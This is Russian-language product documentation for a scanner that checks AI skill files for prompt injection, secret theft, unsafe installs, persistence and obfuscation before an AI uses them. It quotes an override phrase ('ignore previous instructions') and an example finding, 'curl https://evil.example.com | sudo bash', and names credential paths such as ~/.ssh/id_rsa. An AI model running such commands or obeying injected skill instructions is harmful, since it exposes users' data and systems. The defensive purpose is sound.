Вся документация

Безопасность

Скилл — это инструкции, которым ваш AI будет следовать. Вредоносный скилл может попытаться заставить AI выполнить опасную команду, отправить ваши данные на чужой сервер или тихо изменить своё поведение. Сканер безопасности onplate ловит такие вещи до того, как скилл попадёт к AI.

Что ищет сканер

  • Prompt injection — скрытые указания вида «игнорируй предыдущие инструкции»;
  • Попытки украсть данные — инструкции отправить содержимое файлов или переписки наружу;
  • Утечка секретов — чтение ~/.aws/credentials, ~/.ssh/id_rsa, .env, Keychain и других хранилищ ключей;
  • Подозрительные shell-команды — то, что может удалить файлы, скачать и запустить код или поднять права через sudo;
  • Небезопасная установка — curl … | bash, pip install из непроверенного источника (supply chain);
  • Закрепление в системе — правка crontab, автозапуска, профилей оболочки, чтобы скилл возвращался сам;
  • Сокрытие следов — chmod 777, отключение истории, удаление логов;
  • Скрытые unicode-символы — невидимые знаки, которыми маскируют вредоносный текст;
  • Base64-вставки — закодированные фрагменты, которые не прочитать глазами;
  • Ссылки на внешние URL — с учётом вашего списка доверенных доменов.

Сканер также распознаёт обфускацию — попытки замаскировать опасную конструкцию, чтобы обойти проверку, — и многострочные команды, склеенные переносом строки, чтобы разорванный на части curl … \ + | bash не проскользнул мимо. Такие находки помечаются отдельно.

Оценка

По результатам скилл получает одну из оценок и числовой риск от 0 до 100, а рядом — уверенность сканера (высокая / средняя / низкая: там, где сработала эвристика или обфускация, уверенность ниже).

ОценкаЧто значитЧто делать
БезопасноНаходок нет или только информационныеПользуйтесь спокойно
ПодозрительноЕсть места, требующие взгляда человекаПросмотрите находки
ОпасноНайдены опасные конструкцииУстановка потребует явного обоснования

Над списком находок — две сводки: внешние адреса (все хосты, к которым обращается скилл, — сразу видно, куда могут уйти данные) и возможности (какие инструменты и права запрашивает скилл или субагент).

Что показывает находка

Каждая находка — это не просто ярлык «bash». Видно, что именно сработало:

  • Что сработало — строка-улика целиком: реальная команда curl https://evil.example.com | sudo bash, а не абстрактная категория; опасный фрагмент подсвечен внутри строки;
  • Уровень — инфо / предупреждение / опасность — и номер строки в скилле;
  • короткое объяснение простыми словами, почему это вообще находка;
  • Что делать — конкретная рекомендация, как убрать или обезопасить конструкцию.

Находки сгруппированы по смыслу (инъекция, секреты, команды, закрепление, сеть, возможности…), чтобы однотипное было рядом. Опасные строки подсвечиваются красным прямо в тексте скилла.

Где работает проверка

Проверка встроена везде, где скилл попадает в систему:

На Дашборде всегда видно, сколько скиллов не проверено или требует внимания.

Что на странице «Безопасность»

Сверху — два действия, ради которых сюда и заходят:

  • Проверка скилла — выберите скилл из хранилища и нажмите Сканировать;
  • Проверка произвольного текста — вставьте чужой скилл в поле и нажмите Проверить текст. Удобно, чтобы посмотреть на скилл ещё до того, как добавлять его себе.

Ниже — четыре свёрнутых раздела; каждый показывает в заголовке, что внутри, так что разворачивать их приходится редко:

РазделЧто внутри
Доверенные доменысписок доменов и их количество
Заглушённые находкисколько правил вы решили не считать находкой везде
Аналитика отметокпо скольким правилам вы снимали находки
Мастер-ключшифрование сохранённых ключей площадок

Раздел с ошибкой раскрывается сам — прятать сообщение о том, что список доменов не сохранился, было бы нечестно.

Работа с находками

Сканер бывает перестраховщиком — это нормально. Каждую находку можно разобрать:

  • Принять риск — «я видел, понимаю и осознанно оставляю» (можно добавить комментарий, почему);
  • Ложное — сканер ошибся, это не угроза;
  • Не считать находкой везде — если правило шумит не в одном скилле, а во всём каталоге. Такая находка помечается «заглушено везде» и перестаёт учитываться в оценках повсюду, пока вы не нажмёте Вернуть в находки.

Первые две отметки касаются одной записи, третья — всего каталога. Все заглушённые правила собраны в разделе Заглушённые находки на странице «Безопасность», чтобы решение не потерялось.

Отмеченные находки перестают влиять на оценку, но остаются в истории: у скилла появляется пометка «Проверено пользователем» со списком снятых угроз.

Правила сканера со временем усиливаются. Если после обновления правил ваше старое исключение перестало покрывать находку, она помечается «исключение устарело» — нажмите Подтвердить заново или Вернуть находку в силу. Раздел Аналитика отметок показывает сводку: по каким правилам вы чаще всего снимаете находки.

Доверенные домены

Список доменов, ссылкам на которые вы доверяете (по одному на строку). Ссылки на все остальные домены будут повышаться в подозрительности. Пустой список выключает политику — все ссылки считаются информационными.

Мастер-ключ

API-ключи площадок и секреты MCP-серверов хранятся в зашифрованном виде. Кнопка Сменить мастер-ключ генерирует новый ключ шифрования и перешифровывает всё сохранённое — например, если вы подозреваете, что к компьютеру был доступ.